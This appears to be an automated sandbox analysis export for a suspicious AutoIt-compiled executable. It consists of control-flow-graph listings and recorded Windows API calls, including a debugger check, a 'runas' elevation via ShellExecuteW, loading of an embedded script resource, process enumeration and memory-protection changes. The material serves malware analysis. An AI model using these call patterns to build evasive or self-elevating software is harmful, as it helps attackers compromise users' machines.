calls 105605->105606 105607 761100 105606->105607 105608 761121 105607->105608 105637 76113c 48 API calls 105607->105637 105608->104646 105610->104636 105611->104685 105612->104685 105613->104685 105614->104629 105615->104636 105617 76d30a 105616->105617 105618 76d2df 105616->105618 105617->104651 105617->104652 105621 76d2e6 105618->105621 105639 76d349 53 API calls 105618->105639 105621->105617 105638 76d349 53 API calls 105621->105638 105622->104687 105623->104678 105624->104678 105625->104683 105626->104687 105627->104664 105628->104687 105629->104687 105630->104687 105631->104685 105632->104685 105633->104685 105634->104687 105635->104681 105636->104687 105637->105608 105638->105617 105639->105621 105640->104708 105641->104708 105642->104176 105643->104176 105644->104176 105645->104176 105646->104176 105647->104201 105648->104177 105649->104179 105650->104183 105651->104189 105652->104193 105654 7a7700 105653->105654 105665 7a76f9 _wcsncpy 105653->105665 105655 78010a 48 API calls 105654->105655 105656 7a7706 GetFileVersionInfoW 105655->105656 105657 7a7722 __wsetenvp 105656->105657 105658 78010a 48 API calls 105657->105658 105660 7a7739 _wcscat _wcscmp _wcscpy _wcsstr 105658->105660 105659 781bc7 _W_store_winword 59 API calls 105661 7a77f7 105659->105661 105663 7a7779 74D31560 105660->105663 105667 7a7793 _wcscat 105660->105667 105662 7a7827 74D31560 105661->105662 105661->105665 105664 7a783d _wcscmp 105662->105664 105662->105665 105663->105667 105664->105665 105668 78234b 80 API calls 3 library calls 105664->105668 105665->104228 105667->105659 105668->105665 105670 7d4a7d FindFirstFileW 105669->105670 105671 77dd89 105669->105671 105672 7d4a8e 105670->105672 105673 7d4a95 FindClose 105670->105673 105671->104077 105672->105673 105675 76d89e 50 API calls 105674->105675 105676 761a08 105675->105676 105677 7ddb7d 105676->105677 105678 761a12 105676->105678 105680 767e53 48 API calls 105677->105680 105679 7684a6 81 API calls 105678->105679 105681 761a1f 
105679->105681 105682 7ddb8d 105680->105682 105683 76c935 48 API calls 105681->105683 105682->105682 105684 761a2d 105683->105684 105685 761dce 105684->105685 105686 761de4 Mailbox 105685->105686 105687 7ddb26 105686->105687 105690 761dfd 105686->105690 105688 7ddb2b IsWindow 105687->105688 105691 7ddb3f 105688->105691 105692 761e51 105688->105692 105689 761e46 105689->105692 105696 7ddb65 IsWindow 105689->105696 105690->105689 105694 7684a6 81 API calls 105690->105694 105776 76200a 105691->105776 105692->104242 105692->104243 105697 761e17 105694->105697 105696->105691 105696->105692 105723 761f04 105697->105723 105701 76c4cd 48 API calls 105700->105701 105702 79e2fe 105701->105702 105821 76193b SendMessageTimeoutW 105702->105821 105704 79e305 105705 79e309 Mailbox 105704->105705 105822 79e390 105704->105822 105705->104249 105707 79e314 105708 78010a 48 API calls 105707->105708 105709 79e338 SendMessageW 105708->105709 105709->105705 105710 79e34e _strlen 105709->105710 105711 79e378 105710->105711 105712 79e35a 105710->105712 105714 767e53 48 API calls 105711->105714 105827 79e0f5 48 API calls 2 library calls 105712->105827 105714->105705 105715 79e362 105718 767c3a 105717->105718 105720 767bfb 105717->105720 105719 76c935 48 API calls 105718->105719 105722 767c0e 105719->105722 105721 78010a 48 API calls 105720->105721 105721->105722 105722->104248 105724 761f1a Mailbox 105723->105724 105725 76c935 48 API calls 105724->105725 105726 761f3e 105725->105726 105727 76c935 48 API calls 105726->105727 105728 761f49 105727->105728 105729 767e53 48 API calls 105728->105729 105730 761f59 105729->105730 105731 76d3d2 48 API calls 105730->105731 105732 761f87 105731->105732 105733 76d3d2 48 API calls 105732->105733 105734 761f90 105733->105734 105735 76d3d2 48 API calls 105734->105735 105736 761f99 105735->105736 105737 7d2569 105736->105737 105738 761fac 105736->105738 105786 79e4ea 60 API calls 3 library calls 105737->105786 105739 7d2583 105738->105739 105741 761fbe 
GetForegroundWindow 105738->105741 105742 76a4f6 48 API calls 105739->105742 105743 76200a 48 API calls 105741->105743 105744 7d2597 105742->105744 105745 761fcc 105743->105745 105746 7d2899 105744->105746 105749 76a4f6 48 API calls 105744->105749 105747 76197e 48 API calls 105745->105747 105777 762016 105776->105777 105778 78010a 48 API calls 105777->105778 105779 762023 105778->105779 105780 76197e 105779->105780 105781 761990 105780->105781 105785 7619af _memmove 105780->105785 105783 78010a 48 API calls 105781->105783 105782 78010a 48 API calls 105784 7619c6 105782->105784 105783->105785 105784->105692 105785->105782 105786->105739 105821->105704 105847 76193b SendMessageTimeoutW 105822->105847 105824 79e39a 105825 79e39e 105824->105825 105826 79e3a2 SendMessageW 105824->105826 105825->105707 105826->105707 105827->105715 105847->105824 105848->104259 105849->104271 105850->104281 105851->104282 105853 7684a6 81 API calls 105852->105853 105854 7bf7db 105853->105854 105875 7bf81d Mailbox 105854->105875 105888 7c0458 105854->105888 105856 7bfa7c 105857 7bfbeb 105856->105857 105861 7bfa86 105856->105861 105934 7c0579 89 API calls Mailbox 105857->105934 105860 7bfbf8 105860->105861 105862 7bfc04 105860->105862 105901 7bf5fb 105861->105901 105862->105875 105863 7684a6 81 API calls 105881 7bf875 Mailbox 105863->105881 105868 7bfaba 105915 77f92c 105868->105915 105871 7bfaee 105922 763320 105871->105922 105872 7bfad4 105921 7ad520 86 API calls 4 library calls 105872->105921 105875->104296 105876 7bfb05 105878 7714a0 48 API calls 105876->105878 105887 7bfb2f 105876->105887 105877 7bfadf GetCurrentProcess TerminateProcess 105877->105871 105880 7bfb1e 105878->105880 105879 7bfc56 105879->105875 105884 7bfc6f FreeLibrary 105879->105884 105933 7c0300 105 API calls _free 105880->105933 105881->105856 105881->105863 105881->105875 105881->105881 105919 7c28d9 48 API calls _memmove 105881->105919 105920 7bfc96 60 API calls 2 library calls 105881->105920 105883 7714a0 48 API 
calls 105883->105887 105884->105875 105886 76d89e 50 API calls 105886->105887 105887->105879 105887->105883 105887->105886 105935 7c0300 105 API calls _free 105887->105935 105889 76b8a7 48 API calls 105888->105889 105890 7c0473 CharLowerBuffW 105889->105890 105891 7b267a 60 API calls 105890->105891 105892 7c0494 105891->105892 105894 76d3d2 48 API calls 105892->105894 105899 7c04cf Mailbox 105892->105899 105895 7c04ac 105894->105895 105896 767f40 48 API calls 105895->105896 105897 7c04c3 105896->105897 105898 76a2fb 48 API calls 105897->105898 105898->105899 105900 7c050b Mailbox 105899->105900 105936 7bfc96 60 API calls 2 library calls 105899->105936 105900->105881 105902 7bf616 105901->105902 105906 7bf66b 105901->105906 105903 78010a 48 API calls 105902->105903 105905 7bf638 105903->105905 105904 78010a 48 API calls 105904->105905 105905->105904 105905->105906 105907 7c0719 105906->105907 105908 7c0944 Mailbox 105907->105908 105914 7c073c _strcat _wcscpy __wsetenvp 105907->105914 105908->105868 105909 76d00b 58 API calls 105909->105914 105910 76cdb4 48 API calls 105910->105914 105911 7684a6 81 API calls 105911->105914 105912 7845ec 47 API calls std::exception::_Copy_str 105912->105914 105914->105908 105914->105909 105914->105910 105914->105911 105914->105912 105937 7a8932 50 API calls __wsetenvp 105914->105937 105917 77f941 105915->105917 105916 77f9d9 select 105918 77f9a7 105916->105918 105917->105916 105917->105918 105918->105871 105918->105872 105919->105881 105920->105881 105921->105877 105923 763334 105922->105923 105925 763339 Mailbox 105922->105925 105938 76342c 48 API calls 105923->105938 105931 763347 105925->105931 105939 76346e 48 API calls 105925->105939 105927 78010a 48 API calls 105929 7633d8 105927->105929 105928 763422 105928->105876 105930 78010a 48 API calls 105929->105930 105932 7633e3 105930->105932 105931->105927 105931->105928 105932->105876 105933->105887 105934->105860 105935->105887 105936->105900 105937->105914 105938->105925 
105939->105931 105940->104301 105949 7bae3b 105941->105949 105944 7bad05 Mailbox 105945 7bad31 htons 105944->105945 105946 7bad1b 105944->105946 105945->105946 105946->104309 105948 7ad7f2 105947->105948 105948->104316 105950 76a6d4 48 API calls 105949->105950 105951 7bae49 105950->105951 105954 7bae79 WideCharToMultiByte 105951->105954 105953 7bacf3 inet_addr 105953->105944 105955 7bae9d 105954->105955 105956 7baea7 105954->105956 105957 77f324 48 API calls 105955->105957 105958 78010a 48 API calls 105956->105958 105961 7baea5 105957->105961 105959 7baeae WideCharToMultiByte 105958->105959 105960 77f2d0 48 API calls 105959->105960 105960->105961 105961->105953 105963 7c23eb _memset 105962->105963 105964 7c2428 105963->105964 105965 7c2452 105963->105965 105966 76cdb4 48 API calls 105964->105966 105969 76cdb4 48 API calls 105965->105969 105970 7c2476 105965->105970 105967 7c2433 105966->105967 105967->105970 105972 76cdb4 48 API calls 105967->105972 105968 7c24b0 105974 7684a6 81 API calls 105968->105974 105971 7c2448 105969->105971 105970->105968 105973 76cdb4 48 API calls 105970->105973 105976 76cdb4 48 API calls 105971->105976 105972->105971 105973->105968 105975 7c24d4 105974->105975 105977 763bcf 48 API calls 105975->105977 105976->105970 105978 7c24de 105977->105978 105979 7c24e8 105978->105979 105980 7c25a1 105978->105980 105981 7684a6 81 API calls 105979->105981 105982 7c25d3 GetCurrentDirectoryW 105980->105982 105985 7684a6 81 API calls 105980->105985 105983 7c24f9 105981->105983 105984 78010a 48 API calls 105982->105984 105986 763bcf 48 API calls 105983->105986 105987 7c25f8 GetCurrentDirectoryW 105984->105987 105988 7c25b8 105985->105988 105989 7c2503 105986->105989 105990 7c2605 105987->105990 105991 763bcf 48 API calls 105988->105991 105992 7684a6 81 API calls 105989->105992 105996 76ca8e 48 API calls 105990->105996 106000 7c263e 105990->106000 105993 7c25c2 __wsetenvp 105991->105993 105994 7c2514 105992->105994 105993->105982 105993->106000 105995 
763bcf 48 API calls 105994->105995 105997 7c251e 105995->105997 105998 7c261e 105996->105998 106001 7684a6 81 API calls 105997->106001 106002 76ca8e 48 API calls 105998->106002 105999 7c268a 106007 7c274c CreateProcessW 105999->106007 106008 7c26c1 105999->106008 106000->105999 106040 7aa17a 8 API calls 106000->106040 106004 7c252f 106001->106004 106005 7c262e 106002->106005 106009 763bcf 48 API calls 106004->106009 106010 76ca8e 48 API calls 106005->106010 106006 7c2655 106041 7aa073 8 API calls 106006->106041 106020 7c276b 106007->106020 106043 79bc90 69 API calls 106008->106043 106013 7c2539 106009->106013 106010->106000 106015 7c256f GetSystemDirectoryW 106013->106015 106018 7684a6 81 API calls 106013->106018 106014 7c2670 106042 7aa102 8 API calls 106014->106042 106017 78010a 48 API calls 106015->106017 106021 7c2594 GetSystemDirectoryW 106017->106021 106019 7c2550 106018->106019 106022 763bcf 48 API calls 106019->106022 106024 7c27bd CloseHandle 106020->106024 106025 7c2780 106020->106025 106021->105990 106023 7c255a __wsetenvp 106022->106023 106023->105990 106023->106015 106026 7c27cb 106024->106026 106033 7c27f5 106024->106033 106028 7c2791 GetLastError 106025->106028 106044 7a9d09 CloseHandle Mailbox 106026->106044 106027 7c27fb 106030 7c27a5 106027->106030 106028->106030 106045 7a9b29 CloseHandle 106030->106045 106033->106027 106036 7c2827 CloseHandle 106033->106036 106036->106030 106037 7c1f2b 106037->104077 106039 7c26df __wsetenvp 106039->106020 106040->106006 106041->106014 106042->105999 106043->106039 106045->106037 106046->104334 106047->104336 106049 77f057 106048->106049 106050 77f069 106048->106050 106051 77f063 106049->106051 106052 77f05d 106049->106052 106053 76c4cd 48 API calls 106050->106053 106054 76a6d4 48 API calls 106051->106054 106055 76a6d4 48 API calls 106052->106055 106068 7a64f5 106053->106068 106057 7a668b 106054->106057 106056 77f081 106055->106056 106077 764c4f 106056->106077 106059 764c4f 50 API calls 106057->106059 106062 

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0076376D
  • Part of subcall function 00764257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_222.exe,00000104,?,00000000,00000001,00000000), ref: 0076428C
• IsDebuggerPresent.KERNEL32(?,?), ref: 0076377F
• GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_222.exe,00000104,?,00821120,C:\Users\user\Desktop\._cache_222.exe,00821124,?,?), ref: 007637EE
  • Part of subcall function 007634F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0076352A
• SetCurrentDirectoryW.KERNEL32(?), ref: 00763860
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00812934,00000010), ref: 007D21C5
• SetCurrentDirectoryW.KERNEL32(?,?), ref: 007D21FD
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 007D2232
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007FDAA4), ref: 007D2290
• ShellExecuteW.SHELL32(00000000), ref: 007D2297
  • Part of subcall function 007630A5: GetSysColorBrush.USER32(0000000F), ref: 007630B0
  • Part of subcall function 007630A5: LoadCursorW.USER32(00000000,00007F00), ref: 007630BF
  • Part of subcall function 007630A5: LoadIconW.USER32(00000063), ref: 007630D5
  • Part of subcall function 007630A5: LoadIconW.USER32(000000A4), ref: 007630E7
  • Part of subcall function 007630A5: LoadIconW.USER32(000000A2), ref: 007630F9
  • Part of subcall function 007630A5: RegisterClassExW.USER32(?), ref: 00763167
  • Part of subcall function 00762E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00762ECB
  • Part of subcall function 00762E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00762EEC
  • Part of subcall function 00762E9D: ShowWindow.USER32(00000000), ref: 00762F00
  • Part of subcall function 00762E9D: ShowWindow.USER32(00000000), ref: 00762F09
  • Part of subcall function 00763598: _memset.LIBCMT ref: 007635BE
  • Part of subcall function 00763598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00763667
Strings
Memory Dump Source
• Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
• Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
Similarity
• API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
• String ID: C:\Users\user\Desktop\._cache_222.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                        • API String ID: 4253510256-3555659051
                                                                                                                                        • Opcode ID: 21dc64ec9fef616afb8891e5518d0713a6c1771a75d7bd8e936e53d263cc7840
                                                                                                                                        • Instruction ID: 064cf15ada4f9374b38e9b0b1b5b1c4a52c58900b4980e97d063ffe752f4244f
                                                                                                                                        • Opcode Fuzzy Hash: 21dc64ec9fef616afb8891e5518d0713a6c1771a75d7bd8e936e53d263cc7840
                                                                                                                                        • Instruction Fuzzy Hash: AE511970604249FACF20ABA0AC4EFED7B78FB25710F104156FA4296292D67D4A86CB31

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007C3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C2AA6,?,?), ref: 007C3B0E
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C317F
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 007C321E
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007C32B6
                                                                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007C34F5
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C3502
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1240663315-0
                                                                                                                                        • Opcode ID: fc71093ed0729ada6677178ce39d0bfdcbcf36c6725fb17b8294d8ab6da3bcbe
                                                                                                                                        • Instruction ID: 3ec5bc24fa07ad786eb6a04ad227af2d6c14af99d7d1712891f89855410f2e4a
                                                                                                                                        • Opcode Fuzzy Hash: fc71093ed0729ada6677178ce39d0bfdcbcf36c6725fb17b8294d8ab6da3bcbe
                                                                                                                                        • Instruction Fuzzy Hash: 97E14C71204210EFCB15DF28C995E2ABBE9EF89314B04C55DF84ADB261DB39EE05CB52

                                                                                                                                        APIs
                                                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00762A33
                                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00762A5D
                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00762A80
                                                                                                                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00762A8B
                                                                                                                                        • CreatePopupMenu.USER32 ref: 00762A9F
                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00762AAE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                                        • String ID: TaskbarCreated
                                                                                                                                        • API String ID: 157504867-2362178303
                                                                                                                                        • Opcode ID: d5e38e241796a78760278a0b80265f54cd70745fd25dedeaaf7b5766f6800c42
                                                                                                                                        • Instruction ID: e25a0347e05c1582cbb8378124d9590f202b9b2aba89c18a948da129b72d4357
                                                                                                                                        • Opcode Fuzzy Hash: d5e38e241796a78760278a0b80265f54cd70745fd25dedeaaf7b5766f6800c42
                                                                                                                                        • Instruction Fuzzy Hash: 34413731210A45ABDF74AFA4AC4DBB93655F738340F54C226FD03E62A3DAAC9C438765
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExW.KERNEL32(?,00000000), ref: 0077E4A7
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,007FDC28,?,?), ref: 0077E567
                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,007FDC28,?,?), ref: 0077E5BC
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0077E5C7
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0077E5DA
                                                                                                                                        • GetSystemInfo.KERNEL32(?,007FDC28,?,?), ref: 0077E5E4
                                                                                                                                        • GetSystemInfo.KERNEL32(?,007FDC28,?,?), ref: 0077E5F0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2717633055-0
                                                                                                                                        • Opcode ID: e0374f83084cb9aa70e7996e1f0158e9a55eb3ce6c6f4c0f5ec1b87c46f7966b
                                                                                                                                        • Instruction ID: 0764fbe412194dcc0cb1268afa1056cd3ae2665cb5c11e589dae43dafb481ca3
                                                                                                                                        • Opcode Fuzzy Hash: e0374f83084cb9aa70e7996e1f0158e9a55eb3ce6c6f4c0f5ec1b87c46f7966b
                                                                                                                                        • Instruction Fuzzy Hash: 6B6182B180A2C8CBCF15CF6898C11E97F746F2A304F2985D9D8499F34BD628C959CB65
                                                                                                                                        APIs
                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00763202
                                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00763219
                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 007D57D7
                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 007D57EC
                                                                                                                                        • LockResource.KERNEL32(?), ref: 007D57FF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                        • String ID: SCRIPT
                                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                                        • Opcode ID: a9613145145f72e29903a838435038a708b325b77798b2be764f9ec05bfbb2f1
                                                                                                                                        • Instruction ID: d82050b34ff1867fc604c5b16671e5eee887a71459597a49171acf10cbd035d8
                                                                                                                                        • Opcode Fuzzy Hash: a9613145145f72e29903a838435038a708b325b77798b2be764f9ec05bfbb2f1
                                                                                                                                        • Instruction Fuzzy Hash: B3117970200701BFE7218B65EC88F277BBDFBC9B51F208029B9128A290DB75DD10CA60
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007A6F7D
                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 007A6F8D
                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 007A6FAC
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007A6FD0
                                                                                                                                        • _wcscat.LIBCMT ref: 007A6FE3
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 007A7022
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1605983538-0
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 008CB1FA
                                                                                                                                        • GetProcAddress.KERNEL32(?,008C4FF9), ref: 008CB218
                                                                                                                                        • ExitProcess.KERNEL32(?,008C4FF9), ref: 008CB229
                                                                                                                                        • VirtualProtect.KERNEL32(00760000,00001000,00000004,?,00000000), ref: 008CB277
                                                                                                                                        • VirtualProtect.KERNEL32(00760000,00001000), ref: 008CB28C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1996367037-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007A78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 007A78CB
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 007AF04D
                                                                                                                                        • CoCreateInstance.COMBASE(007EDA7C,00000000,00000001,007ED8EC,?), ref: 007AF066
                                                                                                                                        • CoUninitialize.COMBASE ref: 007AF083
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                        • String ID: .lnk
                                                                                                                                        • API String ID: 2126378814-24824748
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: G-v
                                                                                                                                        • API String ID: 0-332975281
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNEL32(0076C848,0076C848), ref: 0077DDA2
                                                                                                                                        • FindFirstFileW.KERNEL32(0076C848,?), ref: 007D4A83
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AttributesFindFirst
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4185537391-0
